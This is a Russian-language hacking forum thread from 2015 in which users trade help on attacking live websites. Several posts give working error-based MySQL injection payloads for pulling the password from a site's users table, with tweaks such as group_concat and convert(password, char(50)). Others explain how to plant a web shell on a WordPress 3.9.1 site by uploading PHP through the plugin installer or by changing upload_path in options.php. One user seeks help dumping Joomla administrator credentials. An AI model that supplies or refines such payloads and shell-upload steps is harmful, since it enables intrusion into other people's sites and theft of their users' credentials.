Старый 20.05.2015, 16:39   #3421
faza02
 
Аватар для faza02
 
Регистрация: 24.12.2010
Сообщений: 77
Репутация: 14
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Запрос к скрипту для вывода password
Код HTML:
112' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,users.password,0x27,0x7e) from `u557`.users where users.id=1 Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1
отдает Subquery returns more than 1 row
Полный запрос выглядит к БД выглядит так:
Код HTML:
[query] => select count(*) from `ads` USE INDEX (city_id) where (`rubric_id`='112' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x27,users.password,0x27,0x7e) from `u557`.users where users.id=1 Order by id limit 0,1) ) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and '1'='1' ) and `city_id`=1 and `deleted`='0' and `archived`='0'
Помогите отладить запрос, чтобы выводился password
заверни password в group_concat() или mid(password,1,100)

Последний раз редактировалось faza02; 20.05.2015 в 18:55..
faza02 вне форума   Ответить с цитированием
Старый 21.05.2015, 17:32   #3422
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Цитата:
Сообщение от faza02 Посмотреть сообщение
заверни password в group_concat() или mid(password,1,100)
Не работает.
Почему вообще при замене во всем запросе только одного слова 'login' на слово 'password' меняется ошибка с 1242 на 1064? Половина полей типа id, email спокойно выводится, пароль, соль - нет. Как так?
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 28.05.2015, 22:59   #3423
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

Подсобите советом
Есть wp 3.9.1
При установке плагина или темы не удаётся залить файл,не хватает прав и так же на редактирование.
Может кто ещё подсказать как залить шелл?

Последний раз редактировалось Faaax; 29.05.2015 в 13:31..
Faaax вне форума   Ответить с цитированием
Старый 29.05.2015, 17:20   #3424
Tim
 
Аватар для Tim
 
Регистрация: 24.03.2011
Сообщений: 59
Репутация: 3
По умолчанию

Цитата:
Сообщение от Faaax Посмотреть сообщение
Подсобите советом
Есть wp 3.9.1
При установке плагина или темы не удаётся залить файл,не хватает прав и так же на редактирование.
Может кто ещё подсказать как залить шелл?
Редактирование файлов тем, плагинов. Возможно на какие-то из файлов будут права.
Tim вне форума   Ответить с цитированием
Старый 29.05.2015, 17:20   #3425
Лаврушкин
 
Регистрация: 05.07.2010
Сообщений: 27
Репутация: 15
По умолчанию

Цитата:
Сообщение от Faaax Посмотреть сообщение
Подсобите советом
Есть wp 3.9.1
При установке плагина или темы не удаётся залить файл,не хватает прав и так же на редактирование.
Может кто ещё подсказать как залить шелл?
Попробуй в плагин-инсталл в лоб скормить ему php файл. далее ищи свой файл в папке wp-content/uploads/год/месяц/файл, либо в папке wp-content/uploads/файл
Выдаст что
The package could not be installed.
Но файл в аплоад папке оставить должен.
Лаврушкин вне форума   Ответить с цитированием
Старый 29.05.2015, 17:36   #3426
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 94
Репутация: 6
По умолчанию

Это с первого раза всё пробовал.
Все файлы попробовал на редактирование+ так же пробовал инсталлить и тему и плагин,и в лоб пхп
не удаётся загрузить файл,даже медиафайл не льётся.
Похоже админ параноик(
Нашёл только чтение дир.
Есть ещё идеи как залиться?
Faaax вне форума   Ответить с цитированием
Старый 29.05.2015, 23:19   #3427
QaRTiN
 
Регистрация: 22.08.2010
Сообщений: 54
Репутация: 0
По умолчанию

Цитата:
Сообщение от Faaax Посмотреть сообщение
Это с первого раза всё пробовал.
Все файлы попробовал на редактирование+ так же пробовал инсталлить и тему и плагин,и в лоб пхп
не удаётся загрузить файл,даже медиафайл не льётся.
Похоже админ параноик(
Нашёл только чтение дир.
Есть ещё идеи как залиться?
если найдешь папку доступную для записи,замени upload_path в site.com/wp-admin/options.php и лей шелл через установку плагинов
QaRTiN вне форума   Ответить с цитированием
Старый 10.06.2015, 00:31   #3428
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Запрос к БД выглядит следующим образом (из текста ошибки):
PHP код:
select count(*) from `ads` USE INDEX (city_idwhere `rubric_id`='112' and `city_id`=and `deleted`='0' and `archived`='0' 
rubric_id не фильтруется должным образом, налицо инъекция. Не могу составить запрос таким образом, чтобы не получить Subquery returns more than 1 row
Мой запрос:
PHP код:
index.php?rubric=112' and(select 1 from(select count(*),concat((select (select password from users where id=1 limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x )a) and '1'='
Знатоки мускуля, помогите с запросом.
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 10.06.2015, 11:51   #3429
NameSpace
 
Регистрация: 21.12.2012
Сообщений: 146
Репутация: 52
По умолчанию

nomad, С этим вектором есть некоторые проблемы. Мы уже исследовали с faza02 их в прошлый раз и продолжаем их исследование. Совокупность длины и типа поля password не дают найти различия в первых 154 символах поля при работе вектора, и они находятся уже при обработке подзапроса.

Код:
password => convert(password, char(50))
Пока контрпримеров не обнаружили (см. тему).
__________________
На правах рекламы.

Последний раз редактировалось NameSpace; 10.06.2015 в 11:58..
NameSpace вне форума   Ответить с цитированием
Старый 13.06.2015, 13:22   #3430
X-Cod
 
Аватар для X-Cod
 
Регистрация: 11.06.2012
Сообщений: 3
Репутация: -1
По умолчанию

Помогите пожалуйста, составить запрос, чтобы наконец-то вывести таблицу с данными о логинах\паролях.
Сайт с MysqlInj
Суть в том, что сканеры показывают что это MySql Time-Based, хотя это Blind MySql. Максимум, что я добился, то это вывел 2 БД + не нужные мне данные (там, всякие таблицы типа jos_components, jos_rating etc).
А мне нужно именно логины и пароли на вход в /administrator/.
Вот таким запросом был вывод (взято из сканнера) - Запрос

Последний раз редактировалось Twost; 13.06.2015 в 22:05..
X-Cod вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot